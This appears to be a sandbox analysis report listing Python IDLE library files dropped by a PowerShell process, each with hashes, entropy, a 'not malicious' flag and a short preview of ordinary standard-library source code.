                              Preview:"Test zzdummy, coverage 100%."....from idlelib import zzdummy..import unittest..from test.support import requires..from tkinter import Tk, Text..from unittest import mock..from idlelib import config..from idlelib import editor..from idlelib import format......usercfg = zzdummy.idleConf.userCfg..testcfg = {.. 'main': config.IdleUserConfParser(''),.. 'highlight': config.IdleUserConfParser(''),.. 'keys': config.IdleUserConfParser(''),.. 'extensions': config.IdleUserConfParser(''),..}..code_sample = """\....class C1:.. # Class comment... def __init__(self, a, b):.. self.a = a.. self.b = b.."""......class DummyEditwin:.. get_selection_indices = editor.EditorWindow.get_selection_indices.. def __init__(self, root, text):.. self.root = root.. self.top = root.. self.text = text.. self.fregion = format.FormatRegion(self).. self.text.undo_block_start = mock.Mock().. self.text.undo_block_stop = mock.Mock()......class Z
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2395
                              Entropy (8bit):4.281607901019118
                              Encrypted:false
                              SSDEEP:48:AYnzOqkWlTtrfYbxMYdDgUPldFXLwGsCsuMj2Zg6Zd2I9gw:AYyWlTJQl1dxhZ1Mjj6bV9gw
                              MD5:45A7D8B634B59D6EA76EB579A06AF8E4
                              SHA1:5AF8DF58A2FB9905FEA785E8DC5C652F02FEF33C
                              SHA-256:FD23AB4162889E63C2240F324CF0CB654B49E17306D0A114CCD7D32C99E636ED
                              SHA-512:F26638F525F2ADC7087A06273E6451701624510E3851D769A2D49209DA75C962FB3625BA1A97CDEC3C3912B1417CF409FEB6762BBA4C9415022DD9FF9518C80B
                              Malicious:false
                              Preview:"""Utilities for testing with Tkinter"""..import functools......def run_in_tk_mainloop(delay=1):.. """Decorator for running a test method with a real Tk mainloop..... This starts a Tk mainloop before running the test, and stops it.. at the end. This is faster and more robust than the common.. alternative method of calling .update() and/or .update_idletasks()..... Test methods using this must be written as generator functions,.. using "yield" to allow the mainloop to process events and "after".. callbacks, and then continue the test from that point..... The delay argument is passed into root.after(...) calls as the number.. of ms to wait before passing execution back to the generator function..... This also assumes that the test class has a .root attribute,.. which is a tkinter.Tk object..... For example (from test_sidebar.py):.... @run_test_with_tk_mainloop().. def test_single_empty_input(self):.. self.do_input('\n').. yield..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):16600
                              Entropy (8bit):4.26433380745449
                              Encrypted:false
                              SSDEEP:192:CvdzdFADnaJAsvQ0gL1/GC/ecHu1mo6Cad/MhLftDjkm4U/beRPuSomGdDUySYS3:Cvd0svQKFcHu1B6Cai1tn41dB
                              MD5:97CCCF70FDB27EC63B2A32B605D7C0C5
                              SHA1:D9F289E28306E8A6161A78C5627F458F83C8EFFF
                              SHA-256:75FC4558F705A521AAA76CD8961DE8E86147E329C57F2496152F1828B2B53261
                              SHA-512:775C2A39D813CD0E80294E9CD80F9C7B55037659D9B0940E6DE3622A3BBFC9F92097D131F560A976E5105FED0FF8F6C2D0EA96AB9AA92B7DD355C02371A357B5
                              Malicious:false
                              Preview:import io..import os..import shlex..import sys..import tempfile..import tokenize....from tkinter import filedialog..from tkinter import messagebox..from tkinter.simpledialog import askstring # loadfile encoding.....from idlelib.config import idleConf..from idlelib.util import py_extensions....py_extensions = ' '.join("*"+ext for ext in py_extensions)..encoding = 'utf-8'..errors = 'surrogatepass' if sys.platform == 'win32' else 'surrogateescape'......class IOBinding:..# One instance per editor Window so methods know which to save, close...# Open returns focus to self.editwin if aborted...# EditorWindow.open_module, others, belong here..... def __init__(self, editwin):.. self.editwin = editwin.. self.text = editwin.text.. self.__id_open = self.text.bind("<<open-window-from-file>>", self.open).. self.__id_save = self.text.bind("<<save-window>>", self.save).. self.__id_saveas = self.text.bind("<<save-window-as-file>>",..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):9568
                              Entropy (8bit):4.732663895198348
                              Encrypted:false
                              SSDEEP:192:gAqE3nXR2RQRORAgCGoCbFcs9mActWC+fP4fF6T+f08RTE9NwraT9:7qEXB8yUARGoQFG+fP4fkSf08wwi
                              MD5:A97F7613301F93E12746F1E9BBA04296
                              SHA1:F7081C142629CF97E41CFAE22C787293A1ACE51C
                              SHA-256:5D3EE0333AD49EA68DCB4B1CDB695C9A7005BB74CB4807E3843D82A9343F7827
                              SHA-512:070154603AD85A6596EFF017A14637B7F318503248671525DEF6DC852FD1850B00D7500D8865CB23B56E23E9FF64BC8DF2AA2D32CAD066C711B1B93E185962F0
                              Malicious:false
                              Preview:"""..A number of functions that enhance IDLE on macOS..."""..from os.path import expanduser..import plistlib..from sys import platform # Used in _init_tk_type, changed by test.....import tkinter......## Define functions that query the Mac graphics type...## _tk_type and its initializer are private to this section....._tk_type = None....def _init_tk_type():.. """ Initialize _tk_type for isXyzTk functions..... This function is only called once, when _tk_type is still None... """.. global _tk_type.. if platform == 'darwin':.... # When running IDLE, GUI is present, test/* may not be... # When running tests, test/* is present, GUI may not be... # If not, guess most common. Does not matter for testing... from idlelib.__init__ import testing.. if testing:.. from test.support import requires, ResourceDenied.. try:.. requires('gui').. except ResourceDenied:.. _tk_type = "cocoa"..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4064
                              Entropy (8bit):5.005631724752357
                              Encrypted:false
                              SSDEEP:96:iUGINklQyEVPzGfk108ditQOF6WFydTqA:5e0OkOtUWEtqA
                              MD5:EAE124B51DFBBAF7FC5AB8233C11467B
                              SHA1:B296C18D03F0EE883A5079056CEAE3864DF2CB9B
                              SHA-256:0873AA2511C4518588021AA884FA250B8D961D1A22BA0BDF11F965ECCC76DB65
                              SHA-512:F764AD36FB79DD26343A5869EEA9F08BFA7787B62984FCF78F823EA28507E09C51CCC0CC00151ACA3ABC723CE8FF379AFEE0050777DB8161FA1A5084C5D51BBC
                              Malicious:false
                              Preview:"""Define the menu contents, hotkeys, and event bindings.....There is additional configuration information in the EditorWindow class (and..subclasses): the menus are created there based on the menu_specs (class)..variable, and menus not created are silently skipped in the code here. This..makes it possible, for example, to define a Debug menu which is only present in..the PythonShell window, and a Format menu which is only present in the Editor..windows....."""..from importlib.util import find_spec....from idlelib.config import idleConf....# Warning: menudefs is altered in macosx.overrideRootMenu()..# after it is determined that an OS X Aqua Tk is in use,..# which cannot be done until after Tk() is first called...# Do not alter the 'file', 'options', or 'help' cascades here..# without altering overrideRootMenu() as well...# TODO: Make this more robust....menudefs = [.. # underscore prefixes character to underscore.. ('file', [.. ('_New File', '<<open-new-window>>'),.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):19103
                              Entropy (8bit):4.5570363133353435
                              Encrypted:false
                              SSDEEP:192:/3CUKuNBAZoPRH3/PfM7xHkOobvB3/6OR3FKszk6DZQnxtQx7mxsOvoBfe:fvKuNBAeJvAn3OvKsz5F8rQKo2
                              MD5:03BC48EA129BED89DA6F83AF1D8C82B4
                              SHA1:D4156CA8C6AE4A453680F955239A90269800B728
                              SHA-256:E745266A652117182F34403F0E66EF62609D9CF1A5A3896F0262B8E82201CA3E
                              SHA-512:D2488E301DE82D53CEFDF7B40B3AC4FC07747DC05CF2C6E8AC2FC91C010BFF4344F1F087820A31A4F798F5EB4C2DF3EDACCC2E253F0D253B1FE0A4ED46494813
                              Malicious:false
                              Preview:"""..MultiCall - a class which inherits its methods from a Tkinter widget (Text, for..example), but enables multiple calls of functions per virtual event - all..matching events will be called, not only the most specific one. This is done..by wrapping the event functions - event_add, event_delete and event_info...MultiCall recognizes only a subset of legal event sequences. Sequences which..are not recognized are treated by the original Tk handling mechanism. A..more-specific event will be called before a less-specific event.....The recognized sequences are complete one-event sequences (no emacs-style..Ctrl-X Ctrl-C, no shortcuts like <3>), for all types of events...Key/Button Press/Release events can have modifiers...The recognized modifiers are Shift, Control, Option and Command for Mac, and..Control, Alt, Shift, Meta/M for other platforms.....For all events which were handled by MultiCall, a new member is added to the..event instance passed to the binded functions - mc_type. This is o
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5903
                              Entropy (8bit):4.45529508410838
                              Encrypted:false
                              SSDEEP:96:vdJMhgVdqtDRm+23pPCexG84pKO0DOjoyFZlBDdB4ecSBb2D/g27t4SKi:ODRmvN4pKOzoyF2AaEB9i
                              MD5:AB5FE50D5E665A8DF203CE105BCB829A
                              SHA1:B8D5C7E39CB9A36902C472FB44C8CF7FFCD58C9D
                              SHA-256:5D91A4B1309A8ABA993D561B5B7CD3247C1FCCA914754F0A510B56B242BC8E17
                              SHA-512:5309B795ECB0F17CAA843E7CD108CFA8AE6AE9F1D91F237C37779250A5ADF9E29221FCA10BAF6D58AF024AEDB3DBFDCEC0AAF60277702A816CCCDFE286CFC1E0
                              Malicious:false
                              Preview:"""Editor window that can serve as an output file..."""....import re....from tkinter import messagebox....from idlelib.editor import EditorWindow......file_line_pats = [.. # order of patterns matters.. r'file "([^"]*)", line (\d+)',.. r'([^\s]+)\((\d+)\)',.. r'^(\s*\S.*?):\s*(\d+):', # Win filename, maybe starting with spaces.. r'([^\s]+):\s*(\d+):', # filename or path, ltrim.. r'^\s*(\S.*?):\s*(\d+):', # Win abs path with embedded spaces, ltrim..]....file_line_progs = None......def compile_progs():.. "Compile the patterns for matching to file name and line number.".. global file_line_progs.. file_line_progs = [re.compile(pat, re.IGNORECASE).. for pat in file_line_pats]......def file_line_helper(line):.. """Extract file name and line number from line of text..... Check if line of text contains one of the file/line patterns... If it does and if the file and line are valid, return.. a tuple of the file name and line numbe
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7387
                              Entropy (8bit):4.697039923507525
                              Encrypted:false
                              SSDEEP:192:LZp3kqHXR0lIfcJD0PcsSAKM3g+KcYU+yn+CXlZs+l+kXlZSpWGu81EW8TFer:LzF3ulRZ0PoAKhlcBfn7VZsKFVZc1EWf
                              MD5:A53945157002F4511A292C5FDDA5DBCB
                              SHA1:8FB3E7630AAAA3604EF2C81DE91A1C870579F4B2
                              SHA-256:1E79FCD497D449836554772C565CBF3F31930F8DA0DDFC499096E23A9F96A18C
                              SHA-512:A44E0E3BDE714714A126AA5ACF2816D260E1AC920FC93AAB0F799D7B33208E9C814C75B112DB85A8DF57009F6A7FB87202506EA2D1A7DFC0824A2A19BF1AA931
                              Malicious:false
                              Preview:"""ParenMatch -- for parenthesis matching.....When you hit a right paren, the cursor should move briefly to the left..paren. Paren here is used generically; the matching applies to..parentheses, square brackets, and curly braces..."""..from idlelib.hyperparser import HyperParser..from idlelib.config import idleConf...._openers = {')':'(',']':'[','}':'{'}..CHECK_DELAY = 100 # milliseconds....class ParenMatch:.. """Highlight matching openers and closers, (), [], and {}..... There are three supported styles of paren matching. When a right.. paren (opener) is typed:.... opener -- highlight the matching left paren (closer);.. parens -- highlight the left and right parens (opener and closer);.. expression -- highlight the entire expression from opener to closer... (For back compatibility, 'default' is a synonym for 'opener')..... Flash-delay is the maximum milliseconds the highlighting remains... Any cursor movement (key press or click) before that removes the..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3200
                              Entropy (8bit):4.420408257925926
                              Encrypted:false
                              SSDEEP:48:0iDEavyxOWcPJ5z3aMnV4HN1VNbssC9cpIK409k/sPmY0:0iDEaqUQMnV4HE9cmKfk/sQ
                              MD5:2A77F8AE0634D53C3E782D53FC00DE69
                              SHA1:CAA12B3AB6028D76D02FA779562BC71693A497A4
                              SHA-256:85CA313137A19C6F9AD57DB14EF0F002D1C298F155D566BC1AC67C12A8EBAF61
                              SHA-512:5E72002612B709FB07916469A97FA13FEB9D8A13DA541AA00AA106A8E42249276261559C8746E7EFA4E1198DF1DD2F0F1AC692B437B8F2D047399CF7D7FB2CBD
                              Malicious:false
                              Preview:import importlib.machinery..import os..import sys....from idlelib.browser import ModuleBrowser, ModuleBrowserTreeItem..from idlelib.tree import TreeItem......class PathBrowser(ModuleBrowser):.... def __init__(self, master, *, _htest=False, _utest=False):.. """.. _htest - bool, change box location when running htest.. """.. self.master = master.. self._htest = _htest.. self._utest = _utest.. self.init().... def settitle(self):.. "Set window titles.".. self.top.wm_title("Path Browser").. self.top.wm_iconname("Path Browser").... def rootnode(self):.. return PathBrowserTreeItem()......class PathBrowserTreeItem(TreeItem):.... def GetText(self):.. return "sys.path".... def GetSubList(self):.. sublist = [].. for dir in sys.path:.. item = DirBrowserTreeItem(dir).. sublist.append(item).. return sublist......class DirBrowserTreeItem(TreeItem):.... def _
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3688
                              Entropy (8bit):4.367317003386653
                              Encrypted:false
                              SSDEEP:96:Kb8tRuNOx5ZtLb7Hix5HZZiFKJvWuKQw4d0H:RtBLLbqHZaiKQwqI
                              MD5:6295402C4B8B4A4A54909E4FD702D2B2
                              SHA1:BE725BDBBA5DAB12FF014ADA034E90797A48E38B
                              SHA-256:48B2C2718F6600CAAB78AC6D2CE5E590978F3BD591D6B32CBBD56077A53B65EF
                              SHA-512:062AC78AC6B8CEFC4BBFADC6194416C6BE00E8624899A5144EE848CDFDEB980B696DA06B6D40A5764416875A66EB85887BE748A5801B1D1B01E98B656F242FDE
                              Malicious:false
                              Preview:from idlelib.delegator import Delegator..from idlelib.redirector import WidgetRedirector......class Percolator:.... def __init__(self, text):.. # XXX would be nice to inherit from Delegator.. self.text = text.. self.redir = WidgetRedirector(text).. self.top = self.bottom = Delegator(text).. self.bottom.insert = self.redir.register("insert", self.insert).. self.bottom.delete = self.redir.register("delete", self.delete).. self.filters = [].... def close(self):.. while self.top is not self.bottom:.. self.removefilter(self.top).. self.top = None.. self.bottom.setdelegate(None).. self.bottom = None.. self.redir.close().. self.redir = None.. self.text = None.... def insert(self, index, chars, tags=None):.. # Could go away if inheriting from Delegator.. self.top.insert(index, chars, tags).... def delete(self, index1, index2=None):.. # Could go away if i
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):20453
                              Entropy (8bit):4.231412469146267
                              Encrypted:false
                              SSDEEP:384:faCxhnXt999acUVY/9rJ34CfFOMrjF5I4XbT1VStbkby31nw7m6kHwXfDqXnzDkt:5R9CorJ3lfFOMrjF5IVtbkb7Oqfov33O
                              MD5:F312FDACB75747F28FC1D9DDA9AF6CA4
                              SHA1:3A55871D1F4B67BFDD5287B3514F82A4BAD40752
                              SHA-256:2B0BD9D69CA690DB15D675A20F6A82EFE85ADEBC41D333492FD3F4E486AED9CC
                              SHA-512:102D402B136E6563230AE917CEDF310C4CD0759E7FFCFF3EB3EFD70B97DDA58674B8F7DB72BCC02A19EC1E558A738124A79AC761262BBC4379E1A7ECB95F9187
                              Malicious:false
                              Preview:"""Define partial Python code Parser used by editor and hyperparser.....Instances of ParseMap are used with str.translate.....The following bound search and match functions are defined:.._synchre - start of popular statement;.._junkre - whitespace or comment line;.._match_stringre: string, possibly without closer;.._itemre - line that may have bracket structure start;.._closere - line that must be followed by dedent..._chew_ordinaryre - non-special characters..."""..import re....# Reason last statement is continued (or C_NONE if it's not)...(C_NONE, C_BACKSLASH, C_STRING_FIRST_LINE,.. C_STRING_NEXT_LINES, C_BRACKET) = range(5)....# Find what looks like the start of a popular statement....._synchre = re.compile(r""".. ^.. [ \t]*.. (?: while.. | else.. | def.. | return.. | assert.. | break.. | class.. | continue.. | elif.. | try.. | except.. | raise.. | import.. | yield.. ).. \b..""", re.VERBOSE | re.MULTILIN
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):64234
                              Entropy (8bit):4.472710608667727
                              Encrypted:false
                              SSDEEP:768:evMEFjYOjUXY18JMbXdbkByxK40E5lVkVCf:evMCjxjUI18yeBmK4JlVa4
                              MD5:EE04B8AAB03DAF9E276568D0FC22C7DF
                              SHA1:6AF22F219F4B9A101A3B3803AE4F9FBB64218E53
                              SHA-256:F4D5E60768AF6543939D3C13E0D8545378263D0B67A05EE0CC4139027D3AA7E3
                              SHA-512:6DD219519DE936D354CB0BDE0502C540E13710485EED855083F32C769D6939DD4E27EBB59E1BD04902C36D9F7CE33A0BCF6C851CD3617D0F321B3E4F449B91F0
                              Malicious:false
                              Preview:#! /usr/bin/env python3....import sys..if __name__ == "__main__":.. sys.modules['idlelib.pyshell'] = sys.modules['__main__']....try:.. from tkinter import *..except ImportError:.. print("** IDLE can't import Tkinter.\n".. "Your Python may not be configured for Tk. **", file=sys.__stderr__).. raise SystemExit(1)....# Valid arguments for the ...Awareness call below are defined in the following...# https://msdn.microsoft.com/en-us/library/windows/desktop/dn280512(v=vs.85).aspx..if sys.platform == 'win32':.. try:.. import ctypes.. PROCESS_SYSTEM_DPI_AWARE = 1 # Int required... ctypes.OleDLL('shcore').SetProcessDpiAwareness(PROCESS_SYSTEM_DPI_AWARE).. except (ImportError, AttributeError, OSError):.. pass....from tkinter import messagebox....from code import InteractiveInterpreter..import itertools..import linecache..import os..import os.path..from platform import python_version..import re..import socket..import subprocess..from textwra
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):15459
                              Entropy (8bit):4.519098654032303
                              Encrypted:false
                              SSDEEP:384:ifBWRzp6UEsUNoyNSLFYffrNf8eF077Zb2:ipijYRJF1
                              MD5:0A18D18FF934096716E9DC8A135AB25D
                              SHA1:3265BB99A70430F518986F2111FC34BF9290E2EB
                              SHA-256:232CF1A09C739BF6C67C0859E2D0DE951776AFECC9DEB2863BCF4A8FC7FCB3BA
                              SHA-512:AD37B759D3A1FBC92A81DE2751B14F34ECE2027083BA9B64FA3A7BB95F5559DA66D3498BAECB1C4987687A232F396E431DBB4280BA4C1D79FE742FA6950262A2
                              Malicious:false
                              Preview:"""..Dialogs that query users and verify the answer before accepting.....Query is the generic base class for a popup dialog...The user must either enter a valid answer or close the dialog...Entries are validated when <Return> is entered or [Ok] is clicked...Entries are ignored when [Cancel] or [X] are clicked...The 'return value' is .result set to either a valid answer or None.....Subclass SectionName gets a name for a new config file section...Configdialog uses it for new highlight theme and keybinding set names...Subclass ModuleName gets a name for File => Open Module...Subclass HelpSource gets menu item and path for additions to Help menu..."""..# Query and Section name result from splitting GetCfgSectionNameDialog..# of configSectionNameDialog.py (temporarily config_sec.py) into..# generic and specific parts. 3.6 only, July 2016...# ModuleName.entry_ok came from editor.EditorWindow.load_module...# HelpSource was extracted from configHelpSourceEdit.py (temporarily..# config_help.py
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6950
                              Entropy (8bit):4.43211367603529
                              Encrypted:false
                              SSDEEP:96:p11bWUtOXkzVYlADrx/b99t2q8YevO+sv83LGNKnR1cn5z9xwIEpnWPgnUVgJS:p11rtOX6iAD6q8YyO7v8i0R1cnKeYnUj
                              MD5:B965E2292C296D5C124522452F719445
                              SHA1:5358416B15C58CF0EC3EFD238E377F7EFA4A812C
                              SHA-256:2D439E1A431457698BF850721ADB1750FCC2B861D942E29199A38EBA310A850D
                              SHA-512:E7A2C464045AF31B40824A51CF3541E6FA780BE95CAE5557264836BEE6631E6F6426F27D15E78C3CC2101BB374877D9CB91E29A4EA1D08A3BEFB842B2D727F93
                              Malicious:false
                              Preview:from tkinter import TclError....class WidgetRedirector:.. """Support for redirecting arbitrary widget subcommands..... Some Tk operations don't normally pass through tkinter. For example, if a.. character is inserted into a Text widget by pressing a key, a default Tk.. binding to the widget's 'insert' operation is activated, and the Tk library.. processes the insert without calling back into tkinter..... Although a binding to <Key> could be made via tkinter, what we really want.. to do is to hook the Tk 'insert' operation itself. For one thing, we want.. a text.insert call in idle code to have the same effect as a key press..... When a widget is instantiated, a Tcl command is created whose name is the.. same as the pathname widget._w. This command is used to invoke the various.. widget operations, e.g. insert (for a Text widget). We are going to hook.. this command and provide a facility ('register') to intercept the widget.. operation. We wil
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):10141
                              Entropy (8bit):4.399944791237853
                              Encrypted:false
                              SSDEEP:192:B+zn33AkCPRjcO//OAkhNg8Gh3S/G/ZiujE0/:Bq3ORjtOPN1Gtoun
                              MD5:8150C3D49FD6093CA8C10F8550D5CE51
                              SHA1:1AEEE3520D2A94AE8A35947C8CEE8F5F95D83A70
                              SHA-256:7EDCEDF77869F69F2BFFF63D02FC0E2EFD2073BC902E94DFEE73112965E293AB
                              SHA-512:3C863C0A34753EACFB780F6DA375E3DFAB892609ADC9820D1D5C53EE0A8BAA471448BE0E38AD27B18B42869E6A79E9AA1DA48853D8CDAF5D829F68C57389A56E
                              Malicious:false
                              Preview:"""Replace dialog for IDLE. Inherits SearchDialogBase for GUI...Uses idlelib.searchengine.SearchEngine for search capability...Defines various replace related functions like replace, replace all,..and replace+find..."""..import re..re.PatternError = re.error # New in 3.13.....from tkinter import StringVar, TclError....from idlelib.searchbase import SearchDialogBase..from idlelib import searchengine......def replace(text, insert_tags=None):.. """Create or reuse a singleton ReplaceDialog instance..... The singleton dialog saves user entries and preferences.. across instances..... Args:.. text: Text widget containing the text to be searched... """.. root = text._root().. engine = searchengine.get(root).. if not hasattr(engine, "_replacedialog"):.. engine._replacedialog = ReplaceDialog(root, engine).. dialog = engine._replacedialog.. searchphrase = text.get("sel.first", "sel.last").. dialog.open(text, searchphrase, insert_tags=insert_tags)...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):21713
                              Entropy (8bit):4.496308091440143
                              Encrypted:false
                              SSDEEP:192:QLz2UIWdHJNLCezFC0wX8/lR5ATNEbOedXYncXrjb8QF/GqIP84Z8379hhZeytVg:Qp9wMUNz2P0a79NF+9/CCKEMY
                              MD5:7386FC887A451A60093A6F4499ADF42C
                              SHA1:F07B1080A0E97F784885B369D05F9D7540BDC575
                              SHA-256:E61EE58F3E64BFCA03C3A3D07E0DCFDCC84507A51E2B6E8B1842C3E3D8C276A3
                              SHA-512:455BEE15FA660E615E88E4F7D40C3B141A77F46100089D4307B61B31E4B21EBF4391FDC5C448181D2C4D3C1A63D6209E1215A2F9B40E78C882AC12EABBD4A1AB
                              Malicious:false
                              Preview:"""RPC Implementation, originally written for the Python Idle IDE....For security reasons, GvR requested that Idle's Python execution server process..connect to the Idle process, which listens for the connection. Since Idle has..only one client per server, this was not a limitation..... +---------------------------------+ +-------------+.. | socketserver.BaseRequestHandler | | SocketIO |.. +---------------------------------+ +-------------+.. ^ | register() |.. | | unregister()|.. | +-------------+.. | ^ ^.. | | |.. | + -------------------+ |.. | | |.. +-------------------------+ +-----------------+.. | RPCHandler | | RPCClient |.. | [attribute of RPCServer]| | |.. +---
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):22105
                              Entropy (8bit):4.572434221436679
                              Encrypted:false
                              SSDEEP:384:QTD9g4tGMCb73QmXs8ya31SOKS2p7uu/avh:QTDKMSU4supYK
                              MD5:8131EDF9CD0101A63B97A9E3AA8E2BA9
                              SHA1:C5F2D3321E179199FDF57AEBA19B776A0E6EDAF0
                              SHA-256:5D444E2D2F5E44885B0FDC1CA0BDFEE7D11DA67BC5E0E466C4C58830D840990D
                              SHA-512:0C6C85742504C7B9C2AA1826E92F052492D0317DF46DBDBA2E15F8D3984FC2BBB012EAAF9BAB594C8C6A69633DAEFAD69EC8E199C1303CAD86A45F22ECDBFE49
                              Malicious:false
                              Preview:""" idlelib.run....Simplified, pyshell.ModifiedInterpreter spawns a subprocess with..f'''{sys.executable} -c "__import__('idlelib.run').run.main()"'''..'.run' is needed because __import__ returns idlelib, not idlelib.run..."""..import contextlib..import functools..import io..import linecache..import queue..import sys..import textwrap..import time..import traceback..import _thread as thread..import threading..import warnings....import idlelib # testing..from idlelib import autocomplete # AutoComplete, fetch_encodings..from idlelib import calltip # Calltip..from idlelib import debugger_r # start_debugger..from idlelib import debugobj_r # remote_object_tree_item..from idlelib import iomenu # encoding..from idlelib import rpc # multiple objects..from idlelib import stackviewer # StackTreeItem..import __main__....import tkinter # Use tcl and, if startup fails, messagebox...if not hasattr(sys.modules['idlelib.run'], 'firstrun'):.. # Undo modifications of tkinter by idlelib import
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8486
                              Entropy (8bit):4.394526090381391
                              Encrypted:false
                              SSDEEP:192:PyoUT6GKOmvyk4vwuHSNiBcKOl6cjNQUm1qp2Y:qN+td4RSwu6U3
                              MD5:B770323D46AF21C55FE741147CE92510
                              SHA1:9EE736BD76735A70E555DE02C4E56C30647B04BD
                              SHA-256:20189DFB2029E2BB18C89A374A4157C36467D4C254B8E0BE4DAA8D9031506E39
                              SHA-512:DBA9393AE268ACE758123D3C5B73F56DEF05416AF890FCE0A9EE4902ABD63C5F448A6C8B47FF5A96789DA16807C56F70313E887723437C71CFF92355303EE24B
                              Malicious:false
                              Preview:"""Execute code from an editor.....Check module: do a full syntax check of the current module...Also run the tabnanny to catch any inconsistent tabs.....Run module: also execute the module's code in the __main__ namespace...The window must have been saved previously. The module is added to..sys.modules, and is also added to the __main__ namespace.....TODO: Specify command line arguments in a dialog box..."""..import os..import tabnanny..import time..import tokenize....from tkinter import messagebox....from idlelib.config import idleConf..from idlelib import macosx..from idlelib import pyshell..from idlelib.query import CustomRun..from idlelib import outwin....indent_message = """Error: Inconsistent indentation detected!....1) Your indentation is outright incorrect (easy to fix), OR....2) Your indentation mixes tabs and spaces.....To fix case 2, change all tabs to spaces by using Edit->Select All followed \..by Format->Untabify Region and specify the number of columns used by each tab..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4629
                              Entropy (8bit):4.518983528010594
                              Encrypted:false
                              SSDEEP:96:oHualFNKnJO79LVHHsy66HEDdve3poL3DdQu9aMsjdnjrt:dgBLVHHsy66H4dG3KL3DSu9aMeRjx
                              MD5:0D6835A9F5421BABC50B534F2210AFC5
                              SHA1:0F606707C3977EEC4F28A70657955D3AC164C5F2
                              SHA-256:4C69E4D4A4D334F4EB941F683C7482DB67CC11B431AF6E255D0AF30F5BD76690
                              SHA-512:C43359BC5A8F18E64A32A3D4891F5911F7D4C577B6ABBC528B1C3A122B1DD558B8D79976D6B44F5E919DF1EF2AFD1CE4399398AAA347A571B5D0435BFDDC3D74
                              Malicious:false
                              Preview:from tkinter import *..from tkinter.ttk import Frame, Scrollbar....from idlelib import macosx......class ScrolledList:.... default = "(None)".... def __init__(self, master, **options):.. # Create top frame, with scrollbar and listbox.. self.master = master.. self.frame = frame = Frame(master).. self.frame.pack(fill="both", expand=1).. self.vbar = vbar = Scrollbar(frame, name="vbar").. self.vbar.pack(side="right", fill="y").. self.listbox = listbox = Listbox(frame, exportselection=0,.. background="white").. if options:.. listbox.configure(options).. listbox.pack(expand=1, fill="both").. # Tie listbox and scrollbar together.. vbar["command"] = listbox.yview.. listbox["yscrollcommand"] = vbar.set.. # Bind events to the list box.. listbox.bind("<ButtonRelease-1>", self.click_event).. listbox.bind("<Double-ButtonRelease-1>", self.double_click_event).. i
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5732
                              Entropy (8bit):4.455142183667095
                              Encrypted:false
                              SSDEEP:96:z6ymYZM53WMCH56KJUcRvWwVRLgKSRUGReo7kYVJwu+P/J6NFAB3Au+km47ybTh:OsM3WMkgRcRewVR5SRUToY7/oFAFADSk
                              MD5:78333A636269433F67D680C0103CA4CD
                              SHA1:B24F9DA07506F12AE2760AC8B361375E584FD085
                              SHA-256:D335B363C13AC46A0DB6E836A1F2522C0AFABCB143C7CBF5920D66C8642936C6
                              SHA-512:99847DBD688300170A88A75EBA15E8269CE84837371E3A77E728E2CA746E992F7C53E00405704E683FE188A765B11D7E3B03D1FCF805B9F307F82853EEABA8E3
                              Malicious:false
